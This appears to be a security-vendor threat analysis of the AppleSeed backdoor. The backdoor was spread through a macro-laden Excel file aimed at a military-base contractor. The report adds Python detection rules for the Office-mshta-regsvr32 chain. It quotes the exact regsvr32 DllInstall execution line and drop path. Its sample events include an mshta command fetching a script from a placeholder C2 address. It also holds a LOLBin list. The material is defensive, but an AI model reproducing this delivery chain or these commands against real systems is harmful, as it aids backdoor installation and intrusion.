The ASEC analysis team recently discovered AppleSeed being distributed to a company that maintains military bases. AppleSeed is a backdoor mainly used by the Kimsuky group and is currently being distributed to multiple targets.
In this case, the malware was delivered in a file named after a military base.
- 20220713_**** base_installation planned dateV004_*** edited_6.xls
AppleSeed was distributed as an Excel file (XLS). The file is password-protected, which keeps anti-malware software from scanning its contents before the user opens it.
When the XLS file is opened, the user is prompted to enable external content as in Figure 2. Clicking the Enable Content button runs the macro, which displays the content shown in Figure 3.
The macro hides the sheet that asked the user to enable content and shows the document's actual content in its place, so nothing looks wrong to the victim. It then uses mshta to download and run an additional script from the C2 server.
The script contains a routine that downloads AppleSeed to the following path and executes it with regsvr32.exe. The /s switch suppresses dialogs, /n skips the DllRegisterServer export, and /i: passes the string that follows it to the DLL's DllInstall export, so the backdoor is started with the attacker-chosen argument rather than through normal COM registration.
- Path: %ProgramData%\Software\ControlSet\Service\ServiceScheduler.dll
- Execution Argument: regsvr32.exe /s /n /i:12345QWERTY [AppleSeed path]
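The delivery chain above (Excel macro spawning mshta, mshta fetching a script from the C2, regsvr32 /s /n /i:<key> loading a DLL from %ProgramData%) leaves a distinctive process-creation trail. The following Python is an added example of detection logic over that trail; it is not ASEC's or AhnLab's code and is not part of the original post. The events are constructed in the style of Sysmon Event ID 1 fields (parent image, image, command line); the C2 address 203.0.113.10 and the .hta file name are invented placeholders, and only the DLL path and regsvr32 arguments come from the page.

```python
"""Detection rules for the AppleSeed delivery chain: Office -> mshta (remote
script) -> regsvr32 /s /n /i:<key> <dll under %ProgramData%>.

Added example written for this page; not ASEC's/AhnLab's code. The sample
process-creation records below are constructed, not from the analysed sample.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Script hosts and LOLBins a document macro has no business spawning.
LOLBINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "powershell.exe",
           "cmd.exe", "wscript.exe", "cscript.exe", "certutil.exe"}
# Directories where a DLL registered via regsvr32 is normally expected to live.
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64",
                r"c:\program files", r"c:\program files (x86)")

URL_RE = re.compile(r"https?://", re.I)
DLL_RE = re.compile(r'"?([a-z]:\\[^"]+?\.dll)"?', re.I)   # first quoted or bare DLL path
INSTALL_KEY_RE = re.compile(r"/i:(\S+)", re.I)            # string handed to DllInstall
NO_REGISTER_RE = re.compile(r"(^|\s)/n(\s|$)", re.I)      # DllRegisterServer skipped


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(ev: ProcEvent) -> list:
    """Return the names of the rules triggered by one process-creation event."""
    hits = []
    parent, child, cmd = basename(ev.parent_image), basename(ev.image), ev.command_line

    # Rule 1: an Office process spawning a script host / LOLBin (the macro running mshta).
    if parent in OFFICE_APPS and child in LOLBINS:
        hits.append(f"office_spawns_lolbin:{parent}->{child}")

    # Rule 2: mshta given a URL, i.e. downloading and executing a remote script.
    if child == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_script")

    # Rule 3: regsvr32 loading a DLL outside trusted directories, plus the
    # /n /i:<string> pattern that passes an install key to DllInstall.
    if child == "regsvr32.exe":
        m_dll = DLL_RE.search(cmd)
        if m_dll:
            dll = m_dll.group(1).lower()
            if not dll.startswith(TRUSTED_DIRS):
                hits.append(f"regsvr32_untrusted_dll:{dll}")
            if "\\programdata\\" in dll:
                hits.append("dll_under_programdata")
        m_key = INSTALL_KEY_RE.search(cmd)
        if m_key and NO_REGISTER_RE.search(cmd):
            hits.append(f"regsvr32_dllinstall_key:{m_key.group(1)}")
    return hits


def scan(events) -> list:
    """Return (index, hits) for every event that triggered at least one rule."""
    return [(i, h) for i, ev in enumerate(events) if (h := analyze(ev))]


# Constructed sample telemetry (not a real capture). 203.0.113.10 is a
# documentation-range address standing in for the C2; update.hta is invented.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" "C:\Users\u\Downloads\plan.xls"'),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://203.0.113.10/update.hta"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32.exe /s /n /i:12345QWERTY C:\ProgramData\Software\ControlSet\Service\ServiceScheduler.dll"),
    # Benign: an installer registering its own COM DLL under Program Files.
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Program Files\Vendor\vendorcom.dll"'),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, hits)
```

Rule 3 is the one worth tuning in a real environment: legitimate installers do call regsvr32 on DLLs under Program Files (the fourth sample event), so the DLL-location check is kept separate from the /n /i:<key> check, and a DLL under %ProgramData% combined with a DllInstall key is treated as the high-confidence signal.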
Once running, AppleSeed continuously receives commands from the C2 server, allowing the attacker to download and run additional modules or perform any other desired behavior on the infected host. For a detailed analysis of AppleSeed, see the linked ASEC report.
The Kimsuky group, which mainly employs AppleSeed, keeps trying new methods to raise the success rate of its attacks. Users should not open attachments in emails from unknown senders and should enable macros only in documents from trusted sources.
AhnLab’s anti-malware software, V3, is currently detecting and blocking the files using the following aliases.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.